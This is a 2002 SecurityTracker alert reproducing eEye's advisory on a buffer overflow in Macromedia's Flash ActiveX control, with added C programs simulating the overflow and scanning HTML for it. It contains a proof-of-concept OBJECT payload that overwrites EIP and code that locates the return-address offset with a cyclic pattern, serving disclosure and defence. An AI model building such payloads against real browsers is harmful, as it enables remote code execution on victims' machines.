SecurityTracker.com
Category:  Application (Multimedia)  >  Flash
Vendors:  Macromedia
Macromedia Flash OCX ActiveX Object for Internet Explorer Contains Buffer Overflow That Allows Malicious HTML to Execute Arbitrary Code on the Victim's Computer
SecurityTracker Alert ID:  1004214
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 3 2002
Impact:  Execution of arbitrary code via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Advisory:  eEye Digital Security
Version(s): version 6 revision 23
Description:  A buffer overflow was reported in Macromedia's Flash OCX (Flash.ocx), a digitally signed ActiveX control loaded by Internet Explorer. A remote user can execute arbitrary code on the target user's computer when malicious HTML is loaded by Internet Explorer.

eEye Digital Security reported that the Flash.ocx ActiveX object does not perform proper bounds checking on the "movie" parameter. A remote user can create malicious HTML that, when loaded by the target (victim) user's Internet Explorer browser, causes arbitrary code to be executed on the target user's computer. The malicious HTML can be delivered by e-mail or web, or by any other application that displays attacker-supplied HTML through the Internet Explorer browser control.

A demonstration exploit example is provided below:

<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
<PARAM NAME=movie VALUE="http://[targethost]/notthere.swf?AAA[...unstated, but fixed number]XXXXXXXX">
</OBJECT>

In this example, the fixed-length run of "A" bytes fills the buffer up to the saved return address, and the "X" bytes overwrite the EIP register. eEye reports the required length as fixed and consistent across Windows platforms, but does not state it.
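The following C program is an added illustration, not code from Flash.ocx, from eEye or from SecurityTracker; it also covers the Technical Description in eEye's message further down. It models the defect class the advisory describes (the "movie" value copied with no length check into a fixed stack buffer that is followed by the saved frame pointer and return address), finds the fixed offset at which EIP is overwritten with a cyclic pattern instead of guessing it, rebuilds a value of the advisory's AAA...XXXX shape from that offset, and puts the bounds check a fixed build needs next to the vulnerable copy. Everything specific is an assumption: the 64-byte buffer, the simulated stack, the function names, and the resulting offset of 68; the real offset in Flash.ocx 6,0,23,0 is not stated on this page.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed 32-bit x86 frame for the "movie" handler: fixed buffer, saved frame pointer, saved
 * return address (EIP). 64 is a stand-in; the real buffer size and offset are not on this page. */
#define MOVIE_BUF  64
#define SAVED_EIP  (MOVIE_BUF + 4)
#define STACK_SIZE 4096   /* simulated stack, so the demo never writes outside real memory */
typedef struct { unsigned char mem[STACK_SIZE]; } sim_stack;

/* Vulnerable handler: copies the value with no length check, the defect class in the advisory. */
static void movie_param_vulnerable(sim_stack *st, const char *movie) {
    size_t n = strlen(movie);
    if (n + 1 > STACK_SIZE) n = STACK_SIZE - 1;   /* keeps only the *simulation* in bounds */
    memcpy(st->mem, movie, n + 1);
}

/* Fixed handler: the value must fit the buffer. Returns 0 if copied, -1 if rejected. */
static int movie_param_fixed(sim_stack *st, const char *movie) {
    size_t n = strlen(movie);
    if (n >= MOVIE_BUF) return -1;
    memcpy(st->mem, movie, n + 1);
    return 0;
}

/* Contents of the saved-EIP slot as a little-endian 32-bit word. */
static uint32_t saved_eip(const sim_stack *st) {
    const unsigned char *e = st->mem + SAVED_EIP;
    return (uint32_t)e[0] | ((uint32_t)e[1] << 8) | ((uint32_t)e[2] << 16) | ((uint32_t)e[3] << 24);
}

/* Cyclic pattern Aa0Aa1...: every 4-byte window is unique, so the bytes found in EIP name
 * their own position. Writes len bytes plus a terminating NUL. */
static void cyclic_pattern(char *out, size_t len) {
    size_t i = 0;
    for (char a = 'A'; a <= 'Z' && i < len; a++)
        for (char b = 'a'; b <= 'z' && i < len; b++)
            for (char c = '0'; c <= '9' && i < len; c++) {
                if (i < len) out[i++] = a;
                if (i < len) out[i++] = b;
                if (i < len) out[i++] = c;
            }
    out[len] = '\0';
}

/* Position of a little-endian 32-bit value inside the pattern, or -1 if absent. */
static long pattern_offset(const char *pat, size_t len, uint32_t val) {
    unsigned char needle[4] = { val & 0xff, (val >> 8) & 0xff, (val >> 16) & 0xff, (val >> 24) & 0xff };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* Feeds a probe_len-byte pattern to the vulnerable handler; reports at which byte of the
 * "movie" value the saved return address begins. */
static long find_eip_offset(size_t probe_len) {
    char *pat = malloc(probe_len + 1);
    if (!pat) return -1;
    sim_stack st = {{0}};
    cyclic_pattern(pat, probe_len);
    movie_param_vulnerable(&st, pat);
    long off = pattern_offset(pat, probe_len, saved_eip(&st));
    free(pat);
    return off;
}

/* The advisory's shape: URL, 'A' filler up to the offset, then four bytes that become EIP. The
 * value is a C string, so an EIP containing a zero byte would be cut short ("XXXX" has none).
 * Returns NULL if the URL alone already overruns the slot. Caller frees. */
static char *build_movie_value(const char *url, size_t offset, uint32_t eip) {
    size_t ulen = strlen(url);
    if (ulen > offset) return NULL;
    char *v = malloc(offset + 5);
    if (!v) return NULL;
    memcpy(v, url, ulen);
    memset(v + ulen, 'A', offset - ulen);
    for (int i = 0; i < 4; i++) v[offset + i] = (char)((eip >> (8 * i)) & 0xff);
    v[offset + 4] = '\0';
    return v;
}

/* Runs the built value through the vulnerable (use_fixed=0) or fixed (use_fixed=1) handler on a
 * fresh frame. Returns the EIP slot afterwards, or -1 if the fixed handler rejected the value. */
static long run_payload(const char *url, size_t offset, uint32_t eip, int use_fixed) {
    char *v = build_movie_value(url, offset, eip);
    if (!v) return -1;
    sim_stack st = {{0}};
    long result = -1;
    if (!use_fixed) movie_param_vulnerable(&st, v);
    if (!use_fixed || movie_param_fixed(&st, v) == 0) result = (long)saved_eip(&st);
    free(v);
    return result;
}

int main(void) {
    const char *url = "http://[targethost]/notthere.swf?";
    long off = find_eip_offset(200);
    printf("saved EIP starts at byte %ld of the movie value\n", off);
    printf("EIP slot, vulnerable build: 0x%08lx\n", run_payload(url, (size_t)off, 0x58585858u, 0));
    printf("fixed build result (-1 = rejected): %ld\n", run_payload(url, (size_t)off, 0x58585858u, 1));
    return 0;
}
```

The program never touches a real return address: the frame is an array, so it runs safely on any platform with a C99 compiler. Two points the model makes concrete: the offset is a property of the control's own frame layout, so it is the same wherever that Flash.ocx build is loaded, which matches eEye's observation that it is consistent across Windows platforms; and because the value travels as a C string, the four bytes placed on EIP cannot contain a zero byte.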

Users should be aware that the vulnerable OCX is digitally signed by Macromedia, so Internet Explorer will accept it as a trusted control: a malicious page can use the codebase attribute to install the vulnerable build on systems that lack Flash or run an older, unaffected version (see the source message below).

Impact:  A remote user can create malicious HTML that, when loaded by a target user, causes arbitrary code to be executed on the target user's computer with the privileges of the target user.
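As an added example (not from SecurityTracker, eEye or Macromedia): the kind of content check a mail or web gateway could run over HTML on its way to Internet Explorer. It flags an OBJECT tag carrying the Flash CLSID from the page whose "movie" PARAM is far longer than any legitimate URL, and separately flags a codebase attribute on that OBJECT, since eEye's message notes the signed vulnerable build can be pushed to clients that way. The scanner, its function and flag names (scan_html, get_attr, HIT_*), the 256-byte threshold, the [targethost] and [attackerhost] placeholders and the flash.cab file name are all assumptions; the sample page is constructed, not captured traffic.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FLASH_CLSID "D27CDB6E-AE6D-11cf-96B8-444553540000"
#define MOVIE_SUSPECT_LEN 256   /* assumed; must sit below the real (unstated) overflow length to be useful */

#define HIT_FLASH_OBJECT 1  /* an OBJECT carrying the Flash CLSID */
#define HIT_LONG_MOVIE   2  /* its "movie" PARAM exceeds MOVIE_SUSPECT_LEN */
#define HIT_CODEBASE     4  /* the OBJECT also names a codebase, i.e. asks IE to fetch and install a build */

/* Case-insensitive substring search over [hay, hay+hlen). */
static const char *ci_find(const char *hay, size_t hlen, const char *needle) {
    size_t nlen = strlen(needle), j;
    for (size_t i = 0; i + nlen <= hlen; i++) {
        for (j = 0; j < nlen && tolower((unsigned char)hay[i + j]) == tolower((unsigned char)needle[j]); j++) {}
        if (j == nlen) return hay + i;
    }
    return NULL;
}

/* Case-insensitive equality of a counted string with a C string. */
static int ci_eq(const char *a, size_t alen, const char *b) {
    if (alen != strlen(b)) return 0;
    for (size_t i = 0; i < alen; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Finds attribute `name` in one tag [tag, end); accepts name="v", name='v' and name=v.
 * On success *val/*vlen cover the value without quotes. */
static int get_attr(const char *tag, const char *end, const char *name, const char **val, size_t *vlen) {
    size_t nlen = strlen(name);
    for (const char *p = tag; (p = ci_find(p, (size_t)(end - p), name)) != NULL; p += nlen) {
        const char *q = p + nlen, *e;
        while (q < end && isspace((unsigned char)*q)) q++;
        if (p == tag || !isspace((unsigned char)p[-1]) || q >= end || *q != '=') continue;
        for (q++; q < end && isspace((unsigned char)*q); q++) {}
        if (q < end && (*q == '"' || *q == '\'')) {            /* quoted value */
            char quote = *q++;
            if (!(e = memchr(q, quote, (size_t)(end - q)))) e = end;
        } else {                                               /* bare value */
            for (e = q; e < end && !isspace((unsigned char)*e) && *e != '>'; e++) {}
        }
        *val = q; *vlen = (size_t)(e - q);
        return 1;
    }
    return 0;
}

/* True if a classid value names Flash, ignoring case, a "clsid:" prefix and braces. */
static int is_flash_clsid(const char *v, size_t vlen) {
    if (vlen > 6 && ci_eq(v, 6, "clsid:")) { v += 6; vlen -= 6; }
    if (vlen > 2 && v[0] == '{' && v[vlen - 1] == '}') { v++; vlen -= 2; }
    return ci_eq(v, vlen, FLASH_CLSID);
}

/* Scans an HTML buffer and returns a bitmask of HIT_* flags. */
static int scan_html(const char *html, size_t len) {
    int flags = 0;
    const char *end = html + len, *v, *n;
    size_t vlen, nlen;
    for (const char *p = html; (p = ci_find(p, (size_t)(end - p), "<object")) != NULL; ) {
        const char *tag_end = memchr(p, '>', (size_t)(end - p));
        if (!tag_end) break;
        if (!get_attr(p, tag_end, "classid", &v, &vlen) || !is_flash_clsid(v, vlen)) { p = tag_end; continue; }
        flags |= HIT_FLASH_OBJECT;
        if (get_attr(p, tag_end, "codebase", &v, &vlen)) flags |= HIT_CODEBASE;
        const char *close = ci_find(tag_end, (size_t)(end - tag_end), "</object");
        const char *body_end = close ? close : end;
        for (const char *q = tag_end, *pe; (q = ci_find(q, (size_t)(body_end - q), "<param")) != NULL; q = pe) {
            if (!(pe = memchr(q, '>', (size_t)(body_end - q)))) break;
            if (get_attr(q, pe, "name", &n, &nlen) && ci_eq(n, nlen, "movie") &&
                get_attr(q, pe, "value", &v, &vlen) && vlen >= MOVIE_SUSPECT_LEN)
                flags |= HIT_LONG_MOVIE;
        }
        p = body_end;
    }
    return flags;
}
static int scan_cstr(const char *html) { return scan_html(html, strlen(html)); }

/* Constructed sample page (not captured traffic): a Flash OBJECT whose movie URL is followed by
 * movie_len 'A's and "XXXX", optionally with a codebase pointing at a hypothetical attacker host. */
static int scan_sample(size_t movie_len, int with_codebase) {
    static char page[4096];
    size_t n = (size_t)snprintf(page, sizeof page,
        "<html><body><p>constructed sample</p>\n<OBJECT classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\"%s>\n"
        "<PARAM NAME=movie VALUE=\"http://[targethost]/notthere.swf?",
        with_codebase ? " codebase=\"http://[attackerhost]/flash.cab\"" : "");
    if (movie_len > sizeof page - n - 64) movie_len = sizeof page - n - 64;
    memset(page + n, 'A', movie_len);
    n += movie_len;
    n += (size_t)snprintf(page + n, sizeof page - n, "XXXX\">\n</OBJECT>\n</body></html>\n");
    return scan_html(page, n);
}

int main(void) {
    printf("benign embed        flags=%d\n", scan_sample(20, 0));
    printf("overlong movie      flags=%d\n", scan_sample(300, 0));
    printf("overlong + codebase flags=%d\n", scan_sample(300, 1));
    return 0;
}
```

It is a heuristic, not an HTML parser: a '>' inside a quoted value, a tag assembled by script at run time, or markup split across comments will slip past it, and the threshold has to sit below the real overflow length, which this page does not give. Its value is in triage at a gateway, not in replacing the upgrade.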
Solution:  The vendor has reportedly released a fixed version (6,0,29,0), available at:

http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash

Vendor URL:  www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
Cause:  Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Thu, 02 May 2002 20:55:43 -0400
Subject:  Macromedia Flash ActiveX Buffer Overflow

 

Macromedia Flash ActiveX Buffer Overflow

Release Date:
05/02/2002

Severity:
High (Remote code execution)

Systems Affected:
Systems with Flash ActiveX OCX Version 6, revision 23
(Possibly older versions)
This includes most installations of Windows.

Description:
All users of Internet Explorer are potentially affected because this is
a Macromedia-signed OCX. We advise them to upgrade their Flash version
immediately to version 6, revision 29 (see the Vendor Status section
below).

This is an unusual advisory in a number of ways. 

One, it was found while investigating an access error encountered during
normal web surfing, which was suspicious. Within a few hours we had
confirmed on multiple Operating Systems that this was an exploitable
condition that overwrote EIP. 

Two, while we tested on these systems with the latest install from the
vendor's site, when we contacted the vendor they informed us that they
had just released a new build this same day which already fixed the
problem. They asked us to confirm this. We tried the link they gave us
and it did indeed fix the problem and was a new build. Testing the link
later that night confirmed the link we used to install the ocx now had
the fixed, latest version.

In this, we congratulate Macromedia for: finding the bug, fixing it, and
releasing the build in a timely fashion. This truly shows that they are
dedicated to security just as they have stated they are.

However, because there is a signed Flash OCX out there which has been
downloaded by an untold number of people, and which could still be
used in an exploit scenario against those without the latest OCX, we
felt the need to release this advisory.

Furthermore, this issue was found in the wild, and it is not safe to
assume it could not be found by others with malicious intent. Nor do we
believe it is safe to assume this has not been found by users with
malicious intent.

There is a vulnerability in the parameter handling of the Flash OCX
which could lead to the execution of attacker-supplied code via e-mail,
the web, or any other avenue in which Internet Explorer is used to
display HTML that an attacker can supply. This includes software which
uses the web browser ActiveX control.

Example:

<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
<PARAM NAME=movie
VALUE="http://www.notthere8979873.com/notthere.swf?AAA[...unstated, but
fixed number]XXXXXXXX">
</OBJECT>

Where X overwrites the EIP consistently across Windows platforms.

Technical Description:

Flash.ocx is an ActiveX object installed with Internet Explorer, and is
used to display Flash objects on the web.

Proper bounds checking is not in place for the "movie" parameter; an
overlong value overwrites EIP at an unstated but fixed number of bytes,
consistent across Windows platforms.

Because the OCX is signed by Macromedia: there is a chance the older
ActiveX could be used against people without Flash; people who have an
older version of Flash that is not affected may be forced to "upgrade"
to the affected version; and, of course, those with the affected
versions need to upgrade lest the exploit work out of the box on them.

There has been considerable debate about legacy ActiveX objects which
have exploits within them. In general, if someone uses the codebase
parameter to point to an affected version of the ActiveX, the system
will first try to grab the ActiveX from Microsoft's ActiveX store on
the web. Then, it will try the ActiveX specified in the codebase tag by
the malicious user.

We do not believe this method is fool-proof.

We do not believe the method is fool-proof because of the potential for
the ActiveX storehouse check to fail and because of the potential for
the ActiveX to be called by other methods. (At least a few potential
other methods are in the RFC for applets and objects.)

However, the other option, setting the "kill bit" for the affected
ActiveX and reassigning the fixed ActiveX version a new classid, is
only a suggestion we will make in this case. We do not believe it is
necessarily mandatory.

Risk should be mitigated to a satisfactory level by users upgrading to
the new OCX.

Vendor Status:
Visit Macromedia's site to get the latest Flash OCX to eliminate these
issues.
http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash

Credit:
Drew Copley

Greetings:
Fat code: presented by Yahoo and Weight Watchers. KROQ, and corn dog
manufacturers world-wide.

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com


 








Copyright 2002, SecurityGlobal.net LLC